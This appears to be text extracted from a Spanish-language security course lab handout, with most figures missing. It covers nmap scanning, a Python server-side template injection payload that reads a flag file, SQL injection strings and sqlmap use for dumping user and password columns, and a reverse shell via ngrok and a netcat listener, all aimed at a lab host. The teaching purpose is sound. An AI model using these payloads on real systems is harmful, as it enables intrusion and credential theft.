Lab 2
Lab 2
Lab 2
Seguridad Digital
Abril-Mayo, 2021
1
ÍNDICE
Índice
1. Laboratorio 2 3
1.1. Laboratorio 2A . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.2. Laboratorio 2B . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
1.3. Laboratorio 2C . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
1.4. Laboratorio 2D . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
2
1. Laboratorio 2
Acerca del Laboratorio 2
Requerimientos:
Es deseable que los asistentes tengan conocimientos previos
en redes convergentes, protocolos de red y sistemas opera-
tivos (Linux y Windows)
Figura 1:
1.1. Laboratorio 2A
1. Desde su máquina virtual con sistema operativo Kali Linux abra una
terminal nueva y ejecute la herramienta nmap e identifique las op-
ciones disponibles:
# K a l i Linux
$ nmap −h
3
1.1 Laboratorio 2A
# K a l i Linux
$ nmap −F oea−labs . ddns . net −oA puertos1 . t x t
Fallas de configuración
4
1.1 Laboratorio 2A
Seguridad Incorrecta
Nivel explotabilidad: 3
Nivel de detectabilidad: 3
Nivel de Prevalencia: 3
Impacto técnico: 2
5
1.2 Laboratorio 2B
1.2. Laboratorio 2B
Server Side Template Injection (SSTI) en Python
Nivel de Prevalencia: 2
Impacto técnico: 3
6
1.2 Laboratorio 2B
Figura 2:
http://oea-labs.ddns.net:5001/home?username={{7*7}}
Figura 3:
http://oea-labs.ddns.net:5001/home?username={{”.__class__.__mro__[1]
.__subclasses__()[312](’cat /home/ubuntu/flask/bandera.txt’,
shell=True, stdout=-1).communicate()[0].strip()}}
De lo anterior:
7
1.2 Laboratorio 2B
8
1.3 Laboratorio 2C
1.3. Laboratorio 2C
Inyección de SQL (sqli)
Nivel de Prevalencia: 2
Impacto técnico: 3
9
1.3 Laboratorio 2C
Figura 4:
Figura 5:
10
1.3 Laboratorio 2C
http://oea-labs.ddns.net/userhack/?id=3&Submit=Submit#
http://oea-labs.ddns.net/userhack/?id=”or ’1’=’1’
Figura 6:
11
1.3 Laboratorio 2C
Figura 7:
∗
sqlmp define las cargas de consulta mediante niveles y riesgos, el
primero define el número de consultas SQL y el segundo el tipo de
consultas (error, union, blind, etc.)
5. Ingrese la letra y para indicar si que la herramienta pruebe si hay
algún otro parámetro vulnerable. En la siguiente Figura se muestra
que la inyección es exitosa y se puede ejecutar mediante boolean-
based blind, time-based blind y UNION query, con sus respectivas
consultas
12
1.3 Laboratorio 2C
Figura 8:
Figura 9:
Figura 10:
13
1.3 Laboratorio 2C
De las 8 columnas listadas, dos tienen valores que podrían tener ser
interesantes para un futuro inicio de sesión: user y password
Figura 11:
Figura 12:
14
1.4 Laboratorio 2D
Figura 13:
1.4. Laboratorio 2D
Ejecución de Código Remoto en un ambiente Linux
Nivel de detectabilidad: 3
Nivel de Prevalencia: 2
Impacto técnico: 3
15
1.4 Laboratorio 2D
Figura 14:
16
1.4 Laboratorio 2D
Figura 15:
Figura 16:
17
1.4 Laboratorio 2D
Figura 17:
Figura 18:
18
1.4 Laboratorio 2D
Figura 19:
19
1.4 Laboratorio 2D
Figura 21:
20
1.4 Laboratorio 2D
Figura 22:
Figura 23:
21
1.4 Laboratorio 2D
Figura 24:
22
1.4 Laboratorio 2D
Figura 25:
Figura 26:
23
1.4 Laboratorio 2D
Figura 27:
Figura 28:
24
1.4 Laboratorio 2D
Figura 29:
Figura 30:
25
1.4 Laboratorio 2D
Figura 31:
Figura 32:
Figura 33:
26
1.4 Laboratorio 2D
Figura 34:
13. Aunque ngrok servirá como puente para la reverse shell, es necesa-
rio capturar la respuesta de manera local. Mediante la herramienta
netcat, se pueden leer conexiones de red de los protocolos TCP y
UDP de puertos remotos a locales. Inicie netcat en el mismo puerto
local especificado por ngrok.
# K a l i Linux
nc −lvpn 4444
27
1.4 Laboratorio 2D
Figura 36:
Figura 37:
28
1.4 Laboratorio 2D
Figura 38:
Figura 39:
Figura 40:
29
1.4 Laboratorio 2D
Figura 41:
30
1.4 Laboratorio 2D
Figura 43:
31